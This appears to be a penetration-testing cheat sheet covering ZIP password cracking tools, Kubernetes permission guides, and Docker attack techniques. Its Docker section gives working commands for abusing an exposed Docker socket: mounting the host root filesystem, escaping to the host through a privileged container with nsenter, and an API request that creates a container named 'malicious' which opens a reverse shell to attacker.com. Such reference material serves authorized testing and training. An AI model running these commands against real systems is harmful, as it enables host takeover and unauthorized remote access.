skywhi@dreamland:/var/log$ _

General and miscellaneous items

Table of Content

Default Credentials

Password cracking

ZIP files

Use fcrackzip to crack passwords for ZIP files with a dictionary or brute-force.

Programs like bkcrack or pkcrack can perform a known plaintext attack to recover the original data.

Kubernetes

Guides

Guide to risky permissions by CyberArk along with their pentest methodology parts 1, 2 and 3.

Docker

Static image analysis

Use tools like dive, container-diff or simply docker history to inspect Docker images and their layers.

Interact with a remote Docker instance through the socket

$ # Forward the socket through SSH
$ ssh [-nNT] -L localhost:4444:/var/run/docker.sock user@remote.com
$ # Now we can execute docker commands remotely
$ docker -H tcp://127.0.0.1:4444 run -v /:/host -it ubuntu:latest
$ # Or curl the API
$ curl --proxy localhost:4444 http://localhost/info
$ # Or get a shell on the host
$ docker -H tcp://127.0.0.1:4444 run --privileged --pid=host -it ubuntu nsenter -t 1 -m -u -n -i sh

API

Use the following to create a container that will run cmd upon start and mount the host's root filesystem under /mnt: 

$ cmd="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'\\\"\"]"
$ curl -s -X POST --proxy localhost:2377 -d "{\"Image\":\"ubuntu\",\"cmd\":$cmd,\"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' 'http://localhost/containers/create?name=malicious'
$ curl -s -X POST --proxy localhost:2377 "http://localhost/containers/malicious/start"

Shell on the host

Get a shell on the host with this (source): 

$ docker run --privileged --pid=host -it alpine:3.8 nsenter -t 1 -m -u -n -i sh

Top of the page - Sitemap -